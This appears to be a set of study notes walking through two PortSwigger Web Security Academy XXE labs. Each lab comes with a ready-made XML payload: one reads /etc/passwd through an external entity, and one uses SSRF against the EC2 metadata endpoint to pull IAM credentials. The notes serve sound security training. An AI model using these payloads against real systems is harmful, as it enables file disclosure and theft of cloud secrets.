XXE - APPRENTICE
tags: Portswigger Web Security Academy Web
- Description: This lab has a “Check stock” feature that parses XML input and returns any unexpected values in the response.
- Goal: To solve the lab, inject an XML external entity to retrieve the contents of the
/etc/passwdfile.
Lab: Exploiting XXE using external entities to retrieve files
Recon
- Use Burp Suite to intercept package
You can notice that it use a normal xml format.
Exp - Inject Directly
Exploit Payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
:::spoiler Success Screenshot
:::
Lab: Exploiting XXE to perform SSRF attacks
- Description: This lab has a “Check stock” feature that parses XML input and returns any unexpected values in the response.
The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is
http://169.254.169.254/. This endpoint can be used to retrieve data about the instance, some of which might be sensitive. - Goal: To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server’s IAM secret access key from the EC2 metadata endpoint.
Recon
- Intercept Package
From the screenshot of the package, we noticed that the xml attached data could be injected.
Exp - Inject Directly
Exploit Payload:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
:::spoiler Success Screenshot
:::